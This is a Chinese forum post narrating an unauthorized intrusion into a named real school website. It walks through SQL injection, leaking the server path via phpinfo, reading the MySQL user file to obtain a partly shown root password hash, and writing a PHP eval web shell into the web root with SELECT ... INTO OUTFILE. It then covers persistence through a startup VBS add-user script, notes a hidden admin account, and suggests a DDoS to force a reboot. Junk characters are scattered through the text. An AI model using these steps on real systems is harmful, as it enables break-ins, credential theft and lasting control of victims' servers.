第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
' M4 M) _) q, u) @2 E) |0 V* j- ~发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!5 H4 A! F6 g& c
8 S7 Q6 y1 F7 _" x2 L
! [7 a/ Y/ D1 c) @1 v u: I9 p: }3 X3 ?, E
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 / }: J$ h! {' q b. f, d
$ k( Q3 i+ X* `% b/ q' Z9 @那么想可以直接写入shell ,getshell有几个条件:4 W q- X4 r. E; ~8 ?, ]$ A
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF . p) J0 p ^+ ? O( k
. t, q$ t, l3 ]. I* z" M
试着爆绝对路径:
( r) L9 ^+ W6 f5 n6 s. L) B1./phpMyAdmin/index.php?lang[]=1
, F* m, q0 x, R- J; O* O$ E2./phpMyAdmin/phpinfo.php
/ _7 I6 D! F! G) W( t, H. \4 ~3./load_file() ; K& u0 a8 H$ R
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
6 T, |# h! ~$ @+ i9 ~3 j6 V5./phpmyadmin/libraries/select_lang.lib.php 1 R x: A6 y* N% r2 h4 u9 J
6./phpmyadmin/libraries/lect_lang.lib.php 3 A$ _5 V/ j1 U5 _$ U6 ]
7./phpmyadmin/libraries/mcrypt.lib.php 1 K& C* [! a: A8 C" C! j
8./phpmyadmin/libraries/export/xls.php / g3 U p \$ H4 j m
# }( J8 {5 U! @+ E# D7 R" g6 z
均不行...........................
' R, a4 W& R3 K+ f" [' K+ N3 D6 ~- @& \- o7 k8 f* x
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
& [+ H. K4 @; f8 w; R+ } v2 E# _) _
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
/ L# m# k+ n- A9 l y- _ |4 E! X: A+ e# N' V8 `' \
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
* ~' e) \, M( C( [1 E. O1 M; ~
% e; y7 B) V, W' S2 y敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... : a, k6 d" A6 \( H
8 p; j9 U# g( T# W3 A; }2 i
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
( r* A5 `6 r% t( r' n8 F- v- H% l' O: S# t- H
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 5 y( f/ ~$ Y6 ^- }- [9 D7 E
5 G o* y; ^6 @% I2 c- [2 H0 f
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
! G" C+ V, x% J5 z) Z
" p: G% r5 C7 h/ z成功读到root密码: 8 ]/ _! u* X! F
% U, O: W( a) s6 N
17---- r(0072) . u" v2 ^6 W8 C) q
18---- o(006f)
" c8 }0 ]4 W& v6 A19---- o(006f)
9 f. z, q' d# l6 }7 T# [+ k20---- t(0074) $ c! W R2 e3 ^9 h4 k
21---- *(002a)
' W, T7 S% q- J$ B22---- 8(0038)
8 Z% s @; o3 u ?% g* O23---- 2(0032) & r8 i# P! y7 ?
24---- E(0045) 1 @' Y, [! `' Y8 G& i7 Z
25---- 1(0031)
' h ~; w( `* V* D( ~2 Y- {- f9 A/ y26---- C(0043)
9 g5 M1 _5 o/ @: T( \4 ^" Q27---- 5(0035)
; c# T7 Y6 K3 n28---- 8(0038) $ A: f1 ~3 G$ \6 ^' W& V2 ?7 {0 Z
29---- 2(0032) : N! ?9 z2 F, W2 L! ^- [
30---- 8(0038) 7 Q" h) ~: ?3 r# ^, a" g
31---- A(0041)
- [, ?# f/ G, S32---- 9(0039) 9 g# S7 `& e; N+ `) U# J
33---- B(0042) Z4 {5 T) H* k' n4 P" n
34---- 5(0035) 8 M$ v( @+ e( U7 z
35---- 4(0034)
! q; N& Y, _0 [, |) ?2 a36---- 8(0038) $ J: M! S) Y, p) S
37---- 6(0036) [/ j) M, I, c" C `
38---- 4(0034) " d( |8 b+ V0 ~8 G! a/ N! V
39---- 9(0039) - s; D3 R9 B/ G: _6 P/ n- c2 G
40---- 1(0031) ; T3 K+ i7 r& S! ^
41---- 1(0031)
) `* _- P3 E, B3 M+ i! d42---- 5(0035)
6 e, _8 K# q3 q; ?, l6 H U X& b43---- 3(0033) 6 z$ N+ H+ }5 n. p, x
44---- 5(0035)
: h* r7 V+ s1 f) w* x45---- 9(0039) 3 _0 z/ e# q! N; U& {
46---- 8(0038)
9 a- j' w6 [0 U9 P% U47---- F(0046)
$ {, @' r- ?: W+ a1 f! k2 L! O48---- F(0046)
+ w% \! b+ W6 N49---- 4(0034)
" b7 x z8 R! P7 g$ C; G50---- F(0046)
' F$ a2 M9 _) t3 D2 e51---- 0(0030) ' m. E$ G0 T* M! }, w6 \8 U3 P" f
52---- 3(0033) / K+ `6 u9 @3 w+ o3 K
53---- 2(0032) + l+ w0 U4 l5 N, E2 n) [
54---- A(0041)
8 J3 @5 W& |6 w2 x8 o+ j: d. x55---- 4(0034)
! D. y& L. m5 ?& u56---- A(0041)
' Q+ y V8 Y8 f5 @( i4 U57---- B(0042)
2 ~) ~( x c& R h: }: D7 z58---- *(0044)
( F) Y) e6 x8 z) ?4 \9 Q' Z59---- *(0035) B- Z( `6 n: l1 ^
60---- *(0041) ( s" X/ p+ R9 {1 K1 l- o8 @
61---- *0032)
# o" _, S* p7 h S# ?' R9 i% Z! x$ B( u. P9 f0 f
解密后成功登陆phpmyamin
; D2 @1 O, _$ R, q( g5 O! ^) _- j+ Z 6 k6 G6 `7 q1 h* B9 d$ ~
' y* c* ], i7 L* |3 S3 T: G X 0 S# _6 j+ F7 Z: a# c
Q# y# h0 C8 ]$ x找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' * s+ p" ` _, S* Y" b3 G! b3 X0 i; z
$ M( Q2 W5 t6 E成功执行,拿下shell,菜刀连接:
" ]3 Y; ~6 B0 J+ ]/ R% }0 m/ h$ W V* W( |& X" x
服务器不支持asp,aspx,php提权无果................... , R" ^8 |6 Z# [1 q7 O
1 X+ N8 @- x( Z. h$ U但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: 0 Y+ Z+ O- I2 D
服务器上已经有个隐藏帐号了
9 S5 ?2 S$ i) _4 \' O别名 administrators
2 `& [) s( z' H2 w" Z注释 管理员对计算机/域有不受限制的完全访问权
/ }2 e- ^' U! l( g成员 {5 N _6 }+ ~( f$ y2 _# g6 B
-------------------------------------------------------------------------------
. z/ J5 {# a' U% Badmin
! N* Y: `# g9 R. hAdministrator
0 o7 m% q. ~3 S' c. o- D$ islipper$; m7 o% c3 ^; K! l
sqluser2 H! | v" {' P( m% g+ j' E) m/ s
命令成功完成。 ' f& ]* N/ ^1 ]
4 d- O( H. D; g- Q. Z1 j3 Z
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
7 h; ]; z& Q! q
- z/ {! P( b0 u% O) D2 h% Nddos服务器重启,不然就只能坐等服务器重启了...............................
1 |* z9 p$ U- g. F- k' p2 w' \* x0 \7 @* e0 r: v2 D) w- |% u" o
- D* Y; j% u% A1 p/ f% T" ~ V
| 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
